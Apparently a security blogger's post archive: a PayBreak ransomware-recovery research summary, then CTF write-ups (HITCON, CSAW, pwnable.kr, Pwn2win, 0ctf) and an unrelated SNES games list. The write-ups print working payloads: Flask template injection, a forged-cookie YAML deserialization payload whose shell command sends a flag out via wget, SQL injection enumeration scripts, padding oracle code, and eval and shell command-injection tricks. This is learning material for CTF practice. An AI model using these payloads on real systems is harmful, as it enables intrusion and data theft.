PayBreak - Generically recovering from ransomware including WannaCry/WannaCryptor

PayBreak - Generically recovering from ransomware including WannaCry/WannaCryptor

Recently I worked on some research with colleagues at Boston University (Manuel Egele, William Koch) and University College London (Gianluca Stringhini) into defeating ransomware. The fruit of our labor, PayBreak published this year in ACM ASIACCS, is a novel proactive system against ransomware. It happens to work against the new global ransomware threat, WannaCry. WannaCry is infecting more than 230,000 computers in 150 countries demanding ransom payments in exchange for access to precious files. This attack has been cited as being unprecedented, and the largest to date. Luckily, our research works against it.

PayBreak works by storing all the cryptographic material used during a ransomware attack. Modern ransomware uses what's called a "hybrid cryptosystem", meaning each ransomed file is encrypted using a different key, and each of those keys are then encrypted using another public encryption key, with the private decryption key held by the ransomware authors. When ransomware attacks, PayBreak records the cryptographic keys used to encrypt each file, and securely stores them. When recovery is necessary, the victim retrieves the ransom keys, and iteratively decrypts each file.

By having PayBreak installed prior to an infection, recovery from ransomware attacks is possible at negligible CPU and RAM overhead.

Recovering from WannaCry Ransomware

At this point, I think I've reverse engineered and researched something like 30 ransomware families, from over 1000 samples. Wannacry isn't really much different than every other ransomware family. Those include other infamous families like Locky, CryptoWall, CryptoLocker, and TeslaLocker.

They all pretty much work the same way, including Wannacry. Actually, this comic sums up the ransom process the best I've seen. Every successful family today encrypts each file for ransom with a new unique "session" key, and encrypts each session key with a "public" ransom key making it irrecoverable without the matching "private" key held closely by ransomware racketeers. Those session keys are generated on the host machine. This is where PayBreak shims the generation, and usage of those keys, and saves them. Meaning, the encryption of those session keys by the ransomware's public key is pointless, and defeated.

Custom AES by WannaCry

The PayBreak system doesn't rely on any specific algorithm, or cryptographic library to be used by ransomware. Actually, Wannacry implemented, or at least, statically compiled its own AES-128-CBC function. PayBreak can be configured to hook arbitrary functions, including that custom AES function, and record the parameters, such as the key, passed to it. However, a simpler approach in this case was to hook the Windows secure pseudorandom number generator function, CryptGenRandom, which the ransomware (and most others) use to create new session keys per file, and save the output of the function calls.

Recorded Keys

Recovering files is simply testing each of the recorded session keys with the encrypted files, until a successful decryption. Decrypting my file system of ~1000 files took 94 minutes.

Encrypted: Desert.jpg.WNCRY
Key used by Wannacry: cc24d9c8388fa566456ccec745e009c8
Decrypted: Desert.jpg

Thanks @jeffreycrowell for sharing a sample with me.
Full paper can be found here:
SHA256 Hash of Sample: 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
WannaCry Custom AES:

Hitcon CTF 2016 Writeups


Secure Posts 1

Web 50

Here is a service that you can store any posts. Can you hack it?

Secret Posts Manager

We're given the source code for this webpage:


It's fairly straight forward of an app. It takes your post, saves it with your session using a secret key. And for every new post, it appends to the previous posts. It additionally allows you to store the posts as either JSON, or YAML. The code is a bit more confusing, and seems to maybe allow you to use Pickle or eval, but that's actually useless/unimportant.

At first glance, I spent a lot of time trying to figure out how to do a YAML Deserialization attack that I read up a little while back on: However, upon further inspection, it just simply isn't possible due to the way the app does serialization and deserialization.

Essentially the code boils down one of two routes, /, or /post. Both start with load_posts(), which will essentially either fail or do yaml.load(). Typically, this would be dangerous, however the data that it's going to unload is completely uncontrollable by us do to it being tied to the session, and the session being integrity controlled by the secret_key.

We have some control over the session through the / route. However, what that route ends up doing is essentially taking our dirty input, and putting it into a dictionary structure. It then serializes that dictionary using yaml.dump(). Now, what we have instead of our dangerous input is just a plain old harmless serialized dictionary that points to some strings. One of those strings may happen to look dangerous, but is still just a string and it will not be parsed as anything else.

So we're out of luck here for doing anything involving deserialization.

There's one other area where user input seems to go:

return render_template_string(template.format(name=name), **args)  

Hmm... I wonder what Google shows up for 'template format injection flask' -

Aha! A bug bounty by the same creator of the challenge, orange, lol!

Testing his same test, {{'7'*7}} into the name field, gives us exactly what he said it would give 7777777.

So, simply changing that to {{config}} is going to render the config module as a string, and output it to us:

<Config {'SESSION_COOKIE_SECURE': False, 'DEBUG': False, 'SESSION_COOKIE_NAME': 'session', 'JSONIFY_PRETTYPRINT_REGULAR': True, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'PREFERRED_URL_SCHEME': 'http', 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SERVER_NAME': None, 'SEND_FILE_MAX_AGE_DEFAULT': 43200, 'TRAP_HTTP_EXCEPTIONS': False, 'MAX_CONTENT_LENGTH': None, 'A': <datetime.tzinfo object at 0x7f3b41b891d0>, 'TRAP_BAD_REQUEST_ERRORS': False, 'JSON_AS_ASCII': True, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'SESSION_COOKIE_DOMAIN': None, 'USE_X_SENDFILE': False, 'APPLICATION_ROOT': None, 'SESSION_COOKIE_HTTPONLY': True, 'LOGGER_NAME': 'post_manager', 'SESSION_COOKIE_PATH': None, 'SECRET_KEY': 'hitcon{>_<---Do-you-know-<script>alert(1)</script>-is-very-fun?}', 'JSON_SORT_KEYS': True}>  

SECRET_KEY is the flag, and the actual session secret key of the website, see below for why that's interesting.

Secure Posts 2

Web 150

Here is a service that you can store any posts. Can you hack it?

Same exact website as as the first part in 'Secure Posts'.

It's important to understand how the app works, so look at the Examination section of Secure Posts 1 to understand how the app works.

From the previous challenge we have the secret key of the website. That means we actually have full control of the data that the app will try to deserialize. Without the secret key, we could not edit the session cookie without violating the signature check. But, now we have it, so it's free game!

import yaml  
from flask.sessions import SecureCookieSessionInterface

key = r"hitcon{>_<---Do-you-know-<script>alert(1)</script>-is-very-fun?}"

class App(object):  
    def __init__(self):
        self.secret_key = None

def load_yaml(data):  
    import yaml
    return yaml.load(data)

exploit = u"some_option: !!python/object/\n \  
  args: [wget$(cat flag2)]\n \
  kwds: {shell: true}\n"

exploit = {'post_type': u'yaml',  
           'post_data': exploit}

app = App()  
app.secret_key = key

# Encode a session exactly how Flask would do it
si = SecureCookieSessionInterface()  
serializer = si.get_signing_serializer(app)  
session = serializer.dumps(exploit)

print("Change your session cookie to: ")  

# Test it on ourselves
#x = serializer.loads(session)

All we really need is some YAML code that does something malicious. This Redhat Article explains how to do a Python with YAML, so we can leverage that to get remote execution. Next we need to form our session into a shape that the webapp likes, so that means making it into the correct dictionary with 'post_type' and 'post_data'.

After we have that session ready, we have to encode it using the same scheme that Flask does. This was easier to do than expected. We can then change our session cookie to the string that a real Flask app would do.

Refresh the page... - - [10/Oct/2016:05:02:55 +0300] "GET /hitcon%7Bunseriliaze_is_dangerous_but_RCE_is_fun!!%7D HTTP/1.1" 301 184 "-" "Wget/1.17.1 (linux-gnu)"  

Are you rich?

Web 50

Description Are you rich? Buy the flag!
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed

Navigate to verify.php, and for address:

d' AND 1=2 UNION ALL SELECT table_name from information_schema.tables LIMIT 3,1 #  

Change the limit to output a different table_name, and keep enumerating to find the table named flag.

I made a tester script:

import requests

URL = ''

for i in range(0, 100):  
    address = r"d' AND 1=2 UNION ALL SELECT table_name from information_schema.tables LIMIT {},1 #".format(str(i))
    data = {'address': address,
            'flag_id': 'flag2',
             'submit': 1}

    r =, data=data)

    if 'not have enough' not in r.text:

Then do

d' AND 1=2 UNION ALL SELECT flag from flag1 #  

And get ...

Error!: Remote API server reject your invalid address 'hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}'. If your address is valid, please PM @cebrusfs or other admin on IRC.  

CSAW Qual CTF 2016 Writeups

The team/club I organize at Boston University just got done competing in the CSAW Qual CTF 2016. It was a bunch of fun, and we came in 119th out of 1274 active teams, top 10%!


Here's some writeups of the challenges I worked on. Other people's writeups can be found at



(Crypto 200)

The challenge was a basic padding oracle attack. A padding oracle attack is present when: 1) A server attempts decryption with padding on controllable data, and 2) The server returns different a different result (i.e. error message) if the cipher text did not unpad correctly (i.e. an oracle). By attempting decryption of specially crafted data, the oracle reveals if unpadding was successful. From that oracle the plaintext can be recovered without the original key.

The challenge presents to you a website that states "Decrypt the matrix", and an input box that generates a new seemingly random base64 string on refresh. Playing around with submitting the box prints a different message depending on the input, either:

  1. Nothing
  2. AES Exception Thrown
  3. Invalid Base64

The random generated base64 string always returns "Nothing", meaning it probably worked successfully.

So there's a few hints here to tell you what to do:

  • "Decrypt the matrix" - Probably have to decrypt something.
  • The Matrix has a very important character named "The Oracle".
  • We get thrown 2 different messages depending on if our input succeeded, or didn't - ala we have an oracle.

So putting those pieces together, this is clearly a Padding Oracle exploit exercise.

This was my first padding oracle exploit. The best website while trying to learn this attack for the challenge was:

From that, I then found some things already built for crafting/testing differently crafted data. I choose, (I also have it easily installable in my sec-tools), as the best one for me. It's a nice Python API, where basically all you have to do is define an oracle function, and make it either Throw a 'BadPaddingException' based on your own logic for what throws that, or make it return successfully. The logic to throw a BadPaddingException can be actual crypto, or it can be a web request, it just has to be logic that causes an oracle to speak.

from paddingoracle import BadPaddingException, PaddingOracle  
from base64 import b64encode, b64decode  
from urllib import quote, unquote  
import requests  
import socket  
import time

class PadBuster(PaddingOracle):  
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)

    def oracle(self, data, **kwargs):
        print("[*] Trying: {}".format(b64encode(data)))

        # Do Crypto that throws something different if padding error
        r ='', data={'matrix-id':b64encode(data)})

        if 'AES' in r.text:
            print ("[*] Padding error!")
            raise BadPaddingException
            print ("[*] No padding error")

if __name__ == '__main__':  
    import logging
    import sys

    # This is a random string the server printed for us, 
    # assuming have to decrypt this, and see what we get
    encrypted_value = 'XImKWrDW5dFvUVDuwbwLy+nHJmDClEXWLcJRmf44atNU2tKZcVFoyT81bmUkL6WPWg7Dn8HMeeWwhiC+CI8QhDtYqGCBidtHZ+alNqnyTn4='
    padbuster = PadBuster()

    value = padbuster.decrypt(b64decode(encrypted_value), block_size=16, iv=bytearray(16))

    print('Decrypted: %s => %r' % (encrypted_value, value))

It's kind of deceptive in the challenge how a new random base64 string is printed to you on every website refresh. Because of that it can be difficult to figure out what you're supposed to decrypt. I ended up actually editing python-paddingoracle to also print the 'IV' (see the padding oracle article above, but basically IV = intermediate value ^ decrypted 1st block). I saw that the IV was \00*16 (typical default for CBC), so that gave me hope that I was on the right path, and that this really was some usefully encrypted data, and that my padding oracle attack was in fact working.

Running the script, and waiting about 30 minutes gets the flag:

Decrypted: XImKWrDW5dFvUVDuwbwLy+nHJmDClEXWLcJRmf44atNU2tKZcVFoyT81bmUkL6WPWg7Dn8HMeeWwhiC+CI8QhDtYqGCBidtHZ+alNqnyTn4= => bytearray(b'\xeeX6\x0c\x99\xb1\xed\x0c4!\xcf\xf0w\xf8u_flag{what_if_i_told_you_you_solved_the_challenge}\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f')  

The Rock

(Reversing 100)

Fairly straight forward ELF64 C++ reverse engineering. Using a mix of static, and dynamic tools you can get a feel of what the program is doing. It was mostly figuring out which functions do something useful.

In this challenge we're give an ELF64 binary. Opening it up in IDA reveals the main function, and that it's written in C++, which means there's going to be a lot more garbage data (virtualism, object-oriented, std library, etc. cruft) to sift through.

There's 3 ways to go down from this:

  1. Purely static analysis - Figure out what each function does, if it's useful or not, typically starting by backtracking from the function that looks most likely to be a validate function. There should be an algorithm that some how compares some form of the input key, to some form of the known good key. The algorithm maybe tricky, and the keys may be shuffled in all sorts of ways, but it boils down to essentially a comparison.

  2. Purely dynamic analysis - Input a key, and follow it down the call stack, and find what it's compared to. Feed that known good key as your input key. This will really only work if the input key is compared without any encoding to it.

  3. Some combination of the above 2.

I ended up doing (1), but (2) was the smarter choice as the input key was being compared directly to an encoded known good key, so simply putting a breakpoint, recording that known good key, and passing it as my input key would do the trick.
But, for whatever reason I wrote the code for (1) instead.

#!/usr/bin/env python
"""Original binary (rock.elf) is verifying a key via:

    input_key = <input>
    encoded_key = 'FLAG23456912365453475897834567'
    clean_key = ''
    for c in k:
        tmp = (c+20) ^ 0x50
        clean_key += (c1+9) ^ 0x10

    return input_key == clean_key

So to reverse it you just have to do the opposite to get the clean_key  
and provide that as the input key  
known_good = "FLAG23456912365453475897834567"  
ans = ""

for c in known_good:  
    tmp = (ord(c)-9) ^ 0x10
    ans += chr( (tmp - 20) ^ 0x50) 

# Let's make sure we did this right
should_be_known_good = ""  
for c in ans:  
    tmp = (ord(c) ^ 0x50) + 20
    should_be_known_good += chr((tmp ^ 0x10) + 9)

if known_good == should_be_known_good:  
    print("Round trip successful, printing the flag: ")

Round trip successful, printing the flag:  


(Reversing 125)

Summary: In this challenge you're given a PE32 executable. The executable looks inside of a key file, and compares the contents to an encoded key. The contents of the file are compared as is to the encoded key.

Executing the program gives us:

"W?h?a?t h?a?p?p?e?n?" 

Opening it up in IDA, and searching for that string, and then backtracing for the root cause reveals to us another interesting string:

Executing the program in wine on Linux crashes... apparently the PE32 uses something that wine hasn't implemented, so you really do need to run this on a Windows box.

So it's pretty obvious that file has to exist. The key is probably put into it and compared directly (it is), but you can verify through running the program in a debugger. That's what I ended up doing, but you can actually skip that and solve this quicker by not.

After getting past the error print, spending some more time debugging, and tracking memory flow reviews to us that the algorithm of this program is basically:

1. Encode the string 'themidathemidathem' by XORing it with a constant key  
2. Encode the result from (1) via some more gibberish.  
3. Compare (3) to the input file key.  

We can follow the flow of the program, and find the result of (2):



(Misc 100)

In this challenge you connect to a server, and it prompts you to provide a correct string that will satisfy a regex expression. You must answer with a satisfiable string, and repeat this process until the server spits out the flag.

I googled for 'reverse regex', and ended up finding the python library rstr. It takes in a regex expression, and returns a string that satisfies it, exactly what we want.

import rstr  
import telnetlib  
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect(("", 8001))

s.recv(1024) # junk read

while True:  
    question = s.recv(1024)

    print("Asking for: " + question)

    if 'Irregular' in question: # printed when we messed up
    if 'flag' in question: # hoping this is printed when we're done

    ans = rstr.xeger(question)
    print("Answering: " + ans)
    # The server can't handle '\n' in the middle of an answer
    # as it thinks that's the end of the answer, so we have to ask
    # again for an answer that doesn't have '\n' in it.
    while '\n' in ans[:-1]:
        print('we fucked')
        ans = rstr.xeger(question)
        print("Answering: " + ans)

nc 8001  
Can you match these regexes?  
Asking for: [QSIb][QVvVxYxS]+(bernie|clementine)0{8}[aWeyq]ag*[a-z]6J{9}[a-z]{6}[T\D\DR0vAp]*(tiger|clinton){9}(table|table)[8gpy]

Answering: ISYVYSvvvvxSxSQVxVxYvVVxQQxvvYVQSxQxYvxxvxVYxxSVxQvxvxQQVvxxQVvxxQVVYxYSSVVVVvxQvQYvxvVxVVVvQclementine00000000eagggggggggggggggggggggggy6JJJJJJJJJvqcnnyYEp]!l)Z'?wUXrtz!TpGekY`wh_|W=Sdj{iE+~=+IZUSR*XRUpxjswI=dIu:PFRd^VrLy$(j!Z&$Ts+>)=@c+)X>BStigerclintontigertigertigerclintonclintonclintontigertable8

[Repeated a bunch more times...]


Top 5 SNES games

It's no secret I'm a huge fan of the Super Nintendo. The well told stories, the beautiful tested-through-time graphics, and the amount of game play in so many of the games made during the '90s of the SNES is just unbelievable.

01. Legend of Zelda

Legend of Zelda 1

This game is just unbelievably polished. The story is intact and cohesive (well as much as you can really get in the 90s). The game play keeps you constantly learning new things. The puzzles and exploration keeps you constantly looking, and thinking. Very few games can capture both whimsy, and bravery in a single package. A feature that sets this game apart as an AAA classic in the SNES era is most definitely the two halves of the game, the Light and the Dark worlds. The graphics in both are amazingly designed, and still stand up today.

Light and Dark worlds

02. Chrono Trigger

Chrono Trigger is not the most beautiful SNES game, nor the best designed. However, it makes up for all of its flaws with a unique and captivating story, alongside a multi-staged universe. The game takes place along 2 continents, and a few islands, but the trick to making the universe so vast is the game's time travel motif. I have yet to see any other game pull off time travel in ANY sort of way that's as enjoyable, and smooth as Chrono Trigger.

03. Super Mario World

Super Mario World provides an amazingly designed world alongside graphics that I feel are unmatched in aging. The game is still stunning today, and the world is just as fun as it was when the game was released.

04. Super Mario 3

Super Mario 3 is in a group of games that is very rare. It's the 3rd game in a series, and the best one out of them. Most often sequels to games never match the success of the original, however Super Mario 3 breaks that and surpasses both predecessors. It builds upon everything great in the prior series while adding several new features that don't take away, but only add fun to the game.

05. Super Mario RPG

This game was released towards the end of the SNES lifespan, and as such didn't do very well. It was forgotten for a little while, but then remembered and today is many SNES fans favorite games. This game is one of the few where you can find typical Nintendo characters (Mario, Luigi, Toad) alongside characters developed by Square Enix. As such, there's main characters in this game, that have yet to be introduced in any other game by Nintendo or with Mario in it.

It's also one of the few games where you'll see Mario and Bowser on the same team, exchanging jokes and breaking the fourth wall together. - cmd1, cmd2, and flag

A few swigs of the Toddler's Bottle from


Solution and approach I took by just printing out my bash history.

ssh -p2222 (pw:guest)

cmd1@ubuntu:~$ history  
    1  ls
# Let's see what do we have here... okay got ourselves a c file.
    2  cat cmd1.c
    3  ls
# Looks like the c file just messes up your PATH env variable. 
# We can just avoid it by using absolute paths.
    4  ./cmd "/bin/cat /home/cmd1/flag"
    5  ./cmd1 "/bin/cat /home/cmd1/flag"
# Hmm. Why's it not working.
    6  ./cmd1 "/bin/cat /home/cmd1/$f"
    7  $f = flag; ./cmd1 "/bin/cat /home/cmd1/$f"
# Oh, because the binary also filters out the word 'flag'.
# Binaries inherit the environment of the shell. We can have a variable that just says 'flag'
# and use that variable instead.
    8  export $f = flag; ./cmd1 "/bin/cat /home/cmd1/$f"
    9  export f = flag; ./cmd1 "/bin/cat /home/cmd1/$f"
# Some fail attempts at setting an env variable
   10  export f=flag; ./cmd1 "/bin/cat /home/cmd1/$f"
   11  env
   12  export f=flag; ./cmd1 "/bin/echo $f"
# Okay that seriously should have worked. What the hell is the problem.
   13  /bin/echo
   14  /bin/echo $f
   15  export f=flag; ./cmd1 "/bin/echo \$f"
# Oh. The shell is expanding $f for us. We need to pass the literal string "$f".
# Gotta escape the $.
   19  export f=flag; ./cmd1 "/bin/cat /home/cmd1/\$f"
Got it. mommy now I get what PATH environment is for :)  
   23  unset f
   24  env
   25  f=flag ./cmd1 "/bin/cat /home/cmd1/\$f"
   26  env
# Some testing. You can just pass a local env variable to programs you execute on the CLI,
# without having to mess up your env for any other programs started from that shell. No
# need to export.


The overall idea to this challenge is to leverage sh built-ins. Notice that I say sh and not bash, that's because the program is doing a system(...) API call, which is actually a wrapper around exec("sh -c ..."). There are major differences between the sh shell, and the bash shell.

This is my solution. It's really crazy, and I'm a bit too lazy to explain it/barely know what I was thinking when I crafted this masterpiece. But, basically the idea is you need a / (e.g. ./cat flag) in order to call a program without a path. So, you have to think of some clever way to get a / into a string.

$ ./cmd2 "\$(printf '%c%c%c%c%c%c%c%c %c%c%c%c%c%c' \$(set \$(printf '%c%c%c%c%c' \$ P A T H); 
set \$(eval echo \$1); echo \${1%no_command_execution_until_you_become_a_hacker}) b i n \$(set  
\$(printf '%c%c%c%c%c' \$ P A T H); set \$(eval echo \$1); echo 
\${1%no_command_execution_until_you_become_a_hacker}) c a t . \$(set \$(printf '%c%c%c%c%c' \$ 
P A T H); set \$(eval echo \$1); echo \${1%no_command_execution_until_you_become_a_hacker}) f l  
a g)"  

There's a much simpler, almost cheating solution to this challenge as well. Read the man page for sh built-in to understand it :).

$ ./cmd2 command -p cat flag

There's also a medium difficulty solution that somebody showed me, but I leave that as an open problem for the


$ wget
$ objdump -d flag

Returns nothing. Strange.

$ chmod +x flag; ./flag
I will malloc() and strcpy the flag there. take it.  

Test that string as being the answer. Wrong - that'd have been too easy.
Okay so it does actually do something and is an executable.

Why would objdump fail? If it's a malformed binary is the only reason. That only happens due to some sort of corruption, most often man-made, in things like malware. Malware is often obfuscated to make diassembly and detection harder. It's actually a very difficult problem to figure out how something is packed, and to then reverse it. Luckily most malware authors, and people in general use popular tools at default settings. UPX is the most popular packer, and the default setting leaves the string "UPX" in the binary.

$ strings flag
$Info: This file is packed with the UPX executable packer $
$Id: UPX 3.08 Copyright (C) 1996-2011 the UPX Team. All Rights Reserved. $

Nice! It's UPX. Let's download a UPX unpacker.

$ upx -d flag

And now to debug the unpacked binary.

$ gdb flag
$ b main
$ r
   0x401163 <frame_dummy+67>:    nop
   0x401164 <main>:    push   rbp
   0x401165 <main+1>:    mov    rbp,rsp
=> 0x401168 <main+4>:    sub    rsp,0x10
   0x40116c <main+8>:    mov    edi,0x496658
   0x401171 <main+13>:    call   0x402080 <puts>
   0x401176 <main+18>:    mov    edi,0x64
   0x40117b <main+23>:    call   0x4099d0 <malloc>

Nice, a strcpy and malloc as promised when the program was executed.

# Inside of gdb:
$ n; n; n; n; n; n
=> 0x401184 <main+32>:    mov    rdx,QWORD PTR [rip+0x2c0ee5]        # 0x6c2070 <flag>

Oh, the flag is just in 0x6c2070

$ telescope 0x6c2070
0000| 0x6c2070 --> 0x496628 ("UPX...? sounds like a delivery service :)")  

Get upx, and peda (the telescope command inside of gdb) from my sec-tools.

Pwn2win 2016 - Python Tokens Writeup

This was a fun little challenge that was primarily thinking (esoteric mostly), reversing, and Python based. The security, or programming expertise is minimal for this one, it's mostly puzzle solving.

Points: 50
Category: Python Exploitation

We discovered a Club’s “homemade” token generator system which uses a fixed value as a seed (is it a joke?). Some Club systems use this token scheme, so we need to make a leak in order to compromise them. Due to a week-long effort, our hardcore newbie SkyMex was able to obtain the token generator source code from a private git repository before it received the official seed.

Submit the flag in the format: CTF-BR{seed}.

We're given a Python file,, and a general description of what the file probably is. It's a token generator system, meaning it's supposed to give 1 time credentials, that are usually seeded from random data. But, this one is apparently using a constant seed, and our mission is to get that seed.

The algorithm of the token generator is summarized here in pseudo-python.

seed = "???????????????????????"  
while True:  
    userinput = input()
    cmd, serialnum = userinput.split()
    if !validate(userinput):
    serialnum = eval(serialnum) # Why???
    if serialnum is int and len(serialnum) == 4:
        token = gentoken(serialnum, seed, date)

The key points of the code are the validation() function, the use of eval, and then the gentoken() function. We already have arbitrary (for the most part) code execution with the eval. But we're facing four challenges:

  1. eval in Python, must be fed an input, that will return a value, and not simply 'do'. Meaning, something like 3+3 can be eval'd, whereas print "Hi mom!" cannot be eval'd - an exception will be thrown.
  2. validate() must successfully return, so we any input we give to the token generator, has to pass the validation which forbids certain characters such, |, and ".
  3. There's also the hidden challenge that after the input() a split() happens. That means if we want to sneak in any python code that's longer than 1 word, we're going to have to do it without spaces like ninjas.
  4. We have to somehow get the seed variable out of the system without breaking (1), (2), and (3).

So how can we get the seed out? We can't simply do a print, because our input would fail (1). However, let's recall how the token is generated, a token essentially mixes together a username (serial number), a randomly generated seed, and a timestamp into a single one time use password. However, this token generator is missing the crucial step of the randomly generated seed, and instead it's a constant. So, the only thing that's actually changing when the token is generated is the timestamp. You cannot rely simply on a timestamp for randomization, because it's predictable and not fine grain enough (meaning, you can only get millisecond precision).

So we can reverse engineer the gentoken() function and figure out how 1ms increases in time change the key, or we can just send as many requests as we can in the 1ms window to the token generator with the same serial number, and get back the same token. However, the token returned will be different for 2 different serial numbers given to it in the same timestamp, awesome!

We can be smart, or we can simply just guess every possible letter for every character in the seed string.

if seed[i] == guess:  
    return 2017
    return 1000

So we have to fit that construct somehow into the input(), without breaking (1), (2), and (3) from above. I set up a test bench for this to figure out what exactly can I fit into a string that'll still pass.

# This validation() is copy pasted from given to us
def validation(input):  
    err = int()
    input = str(input)
    # 3,4,6,8,9,-,/,*,%,<,>, and bunch more banned
    nochrs = [34,60,62,33,64,35,36,37,94,38,42,45,47,51,52,54,56,57,63,92,96,124,59,123,125]
    for i in input:
        if ord(i) in nochrs:
            err = 1
            err = 0
    if not err: return 1
    else: return 0

# This function is used to just test for what successfully gets past (1) and (2)
def test_seed():  
    seed = "flag{}"
    cmd = "gen"
    tmp = eval("{cmd:eval('''2017.if.seed[2].==.'{}'.else.1000'''.replace('.',chr(0x20)))}")
    if validation("eval('''2017.if.seed[2].==.'{}'.else.1000'''.replace('.',chr(0x20)))"):
    if (type(tmp.values()[0])) == int:
        print("yes int")
    if len(str(tmp.values()[0])) == 4:


Awesome, we found a string that passes validation, and outputs 2 different values based on what seed actually is. There is however one extra little pain here. If you look at the list of banned characters in validation, you'll notice that the ASCII representation of the numbers, 3, 4, 6, and some others are banned. That means we can't pass a string that indexes directly into seed[2], or seed[4], and so on. We also cannot test if the valid guess for the seed index is a '3', or a '4', and so on. Lucky for us, the ASCII representation of '1' is not banned, so we can simply just add a bunch of 1's to form the actual value we want.

from datetime import datetime  
from socket import *  
import telnetlib, struct

s=socket(AF_INET, SOCK_STREAM)  
s.connect(('', 6037))  
t = telnetlib.Telnet()  
t.sock = s

for i in range(0,60):  
    for x in range(20, 128):
        # Fun little hack to get in arbitrary numbers due to some characters being banned
        x = "1+"*x
        x = x.rstrip("+")
        index = "1+"*i
        index = index.rstrip("+")
        if i == 0:
            index = '0'

        # Let's take a guess of what seed[i] might be
        guess = "gen eval('''2017.if.seed[{}].==.chr({}).else.1000'''.replace('.',chr(0x20)))".format(index, x)

        # Did we guess right?!
        r = t.read_until(">>>")
        # This number is the different one if you give a serial number of 2017 instead of 1000
        if '47872900' in r: 
            print(i, chr(eval(x)))

And you end up with several of these:

(0, 'J')

Token: 47872897  
Valid until: 1:1:59  
(3, '5')

Token: 47872897  

I believe there's an unintentional bug, or something in the code as well, because we shouldn't be able to send and receive ~40 requests in 1ms across the Internet. It seems that the token generator is a bit broken and doesn't even change for every millisecond increase.

Also in my solution there actually an off by one error (I just guessed and fixed it up), so you'll end up with the string: Jf{5pvg:cbi4QvohpPtibf:fjijfhi4jftfFovHi, which is the answer + 1 to each character, where the real one is:


0ctf 2016 Boomshakalaka (plane) Writeup

boomshakalaka (plane)

play the game, get the highest score


This was an Android reverse engineering challenge. We're given an apk, plane.apk. First thing to do is check out the apk by launching an emulator, or using your phone. I do some Android development right now, so I already had a couple of Android VMs ready made in Android Studio.

$ adb devices
List of devices attached  
emulator-5556    device  
$ adb install plane.apk # Note: The emulator must have an ARM ABI, not x86 for this apk

Turns out it's a pretty fun game! Nothing really sticks out from a security and puzzle perspective.
Well, let's take a look into the source code. We're given an apk file, which is just a fancy Android jar, and a jar file is just a fancy Java zip file, so all the contents that form the app are contained inside the apk and just need to be unpacked. We can either unpack the dex files (fancy Android .class files), or smali assembly. I did the latter first, by using the tool, apktool.

$ apktool d plane.apk
$ ls
AndroidManifest.xml  apktool.yml  assets  lib  original  res  smali  
$ ls smali/com/example/plane/
a.smali  BuildConfig.smali  FirstTest.smali  R$attr.smali  R$drawable.smali  R.smali  R$string.smali  

We have every file inside of the apk, you can browse around the directories and figure out how the application works. The interesting parts are in a.smali, and FirstTest.smali. The first thing you'll notice is the base64 string: const-string v0, "YmF6aW5nYWFhYQ==", decoded to: "bazingaaaa" - funny. Without diving into how to read Java bytecode, it looks like the programs don't really do too much interesting except set some shared preferences (persistent global variables), put some weird strings (DATA, N0, and MG) into them, and call the init functions. There's no actual game logic anywhere though - it must be implemented elsewhere. Looking back into the directories that apktool told us, we can find lib/armeabi/ So the actual logic and everything for the game must be written in "native code" inside of the We have to take a peak at the code inside of that compiled native binary... but before that, let's backtrack and make sure we understand the Java side of the code.

I know of a couple more tool for decompiling and reversing Android programs, dex2jar and jd-gui. All these great tools used are included in my sec-tools collection.

$ dex2jar plane.apk
dex2jar plane.apk -> ./plane-dex2jar.jar  
$ jdgui plane-dex2jar.jar

Produces us these decompiled Java files: and Pretty much what we understood in the earlier smali files, but much clearer. This is a good technique to keep in mind when reversing future Android apps.

Back to the, let's look for those strings we saw on the Java side of the app, specifically DATA (that's a juicy one).

IDA Strings

Interesting other strings near it.

IDA Cross References

setStringForKey from cocos2d seems to use this string in some sort of way. Looking up what the function does leads me to cocos2d reference manual. It looks like the function sets a key to be equal to a string. This sounds like persistent memory storage, for things like the game score!

Remember the description of this challenge... our goal is to get the highest score. Remembering my teenage years, I used to cheat in some games that stored things like the game score in a simple text file. I wonder if we can do the same thing here, and just change some number stored in a text file, get the highest score, and get our flag.

Let's do that.

$ adb shell
$ cd /data/data/com.example.plane/shared_prefs
$ cat Cocos2dxPrefsFile.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>  
    <int name="HighestScore" value="14000" />
    <string name="DATA">MGN0ZntDMGNvUzJkX0FuRHJvdz99ZntDMGNvUzJkX0FuRHJvMWRzdz99ZntDMGNvUzJkX0FuRHJvRfdz99ZntDMGNvUzJkX0FuRHJvMWRzdz99ZntDMGNvUzJkX0FuRHJvMWdz99ZntDMGNvUzJkX0FuRHJvRfRz</string>
    <boolean name="isHaveSaveFileXml" value="true" />
$ echo 'MGN0ZntDMGNvUzJkX0FuRHJvdz99ZntDMGNvUzJkX0FuRHJvMWRzdz99ZntDMGNvUzJkX0FuRHJvRfdz99ZntDMGNvUzJkX0FuRHJvMWRzdz99ZntDMGNvUzJkX0FuRHJvMWdz99ZntDMGNvUzJkX0FuRHJvRfRz' | base64 --decode

Trying out, 0ctf{C0coS2d_AnDrow?} won't do us any good, it's not the flag. I tried a bunch of combinations such as 0ctf{0ctf{C0coS2d_AnDro1d?} as well, it's none of that. Okay. Let's think. We seem to have a repeating pattern in the base64. Some examination of the base64 compared to the ASCII output reveals that MGN0 is actually '0ct', and ZntD is 'f{C', and dz99 is 'w?}', and some stuff inbetween. It looks like we have to use the pieces of data we saw in the .so binary to form some sort of base64 that'll decode into the flag. Editing the HighestScore value to 1000000 and playing the game, and then checking back the xml file doesn't seem to do anything.

If you look for all the tiny strings near the ones we found around DATA that are "base64-esque", you'll get this list: Jv Uz X0 Zn tD dz99 MG Nv Fu Jk RH 4w S2 Vf b1 9z RV Bt Rz Rf MW. We have to probably use them in the right order, we already know the placement of most of those. We really only need to basically place ~8 strings in the correct order that'll decode correctly into ASCII. You can bruteforce, or you can examine the binary .so some more.

